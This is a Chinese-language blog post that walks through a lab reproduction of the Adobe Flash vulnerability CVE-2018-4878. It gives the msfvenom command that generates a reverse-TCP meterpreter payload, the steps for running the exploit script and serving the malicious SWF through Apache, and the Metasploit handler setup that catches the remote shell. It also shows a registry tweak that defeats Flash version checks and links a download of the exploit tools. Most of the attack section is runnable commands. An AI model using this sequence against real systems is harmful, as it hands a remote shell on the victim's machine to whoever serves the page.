CVE-2018-4878 Flash 0day

2018-08-31  本文已影响45人  二潘

1、漏洞概述

2018年2月1号,Adobe官方发布安全通报(APSA18-01),声明Adobe Flash 28.0.0.137及其之前的版本,存在高危漏洞(CVE-2018-4878)。

攻击者通过构造特殊的Flash链接,当用户用浏览器/邮件/Office访问此Flash链接时,会被“远程代码执行”,并且直接被getshell。

直到2018年2月5号,Adboe才发布补丁来修复此0 day漏洞。

漏洞影响的版本:


image.png

2、漏洞的复现

0x01环境的配置:
攻击机:Kali 192.168.10.116
靶机:win7 192.168.10.100
exp:cve-2018-4878.py
flash:flashplayer_activex_28.0.0.137.exe

上面用到的工具都放在网盘里面了:https://pan.baidu.com/s/1dotCoCx0AX8sgUaOqFT9vw 密码:0li0

1.png

漏洞的复现是参照大佬的陈鑫杰这篇文章写的

0x02漏洞的复现
1、将网盘中的CVE-2018-4878-master目录下载下来,并放入Kali Linux桌面


2.jpg

2、使用msfvenom生成shell代码
生成代码,其中lhost为kali的ip地址,lport为自定义的端口号

 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.10.116 lport=8888  -f  python>shellcode.txt 
3.jpg

3、查看代码文件
cat shellcode.txt


4.jpg

4、进入CVE-2018-4878-master目录,编辑CVE-2018-4878.py文件
将上面msfvenom生成的代码覆盖掉原来的代码:


5.jpg

5、查看当前路径


6.jpg

6、修改CVE-2018-4878.py下面的文件信息(后面会用到,之后保存修改退出):


7.jpg

7、Kali Linux进入CVE-2018-4878-master路径,用Python执行CVE-2018-4878-master.py代码

root@kali:~/Desktop/CVE-2018-4878-master# python cve-2018-4878.py
root@kali:~/Desktop/CVE-2018-4878-master# ls -l 
8.jpg

8、Kali Linux开启Apache2服务,并将上面的2个文件放入/var/www/html目录中(apache web路径)

root@kali:~/Desktop/CVE-2018-4878-master# service apache2 start 
root@kali:~/Desktop/CVE-2018-4878-master# cp index2.html /var/www/html/index2.html 
root@kali:~/Desktop/CVE-2018-4878-master# cp exploit.swf /var/www/html/exploit.swf 
9.jpg

此时,Kali Linux上Web服务启动,并且具备index2.html这个页面。只要靶机启用flash并访问了这个页面,则可以直接被控制。
9、Kali Linux开启Shell会话监听

使用handler监听模块 
msf > use exploit/multi/handler 
回弹一个tcp连接 
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp 
设置kali渗透机的ip地址 
msf exploit(handler) > set lhost 192.168.10.116
设置监听端口,这个需跟上面msfvenom设置的端口一致 
msf exploit(handler) > set lport 8888 
开启监听,等待肉鸡上线 
msf exploit(handler) > exploit
10.png
10、Windows7 安装flash插件,并用IE浏览器访问页面
安装flash插件 ,安装flash的时候可能出现让你下载最新版本,可以断网之后进行安装(或者如果是X64操作系统的话,我是win7 x64 就修改注册表里面的内容HKEY_LOCAL_MACHINE/SOFTWARE/wow6432Node/Macromedia/FlashPlayer/SafeVersions)
11.jpg
11、使用Win7内置IE 8浏览器访问页面:http://192.168.10.116/index2.html
12.jpg
12、Kali Linux 上获取meterpreter shell,并进行管理
12.jpg
实验结束
上一篇下一篇

猜你喜欢

热点阅读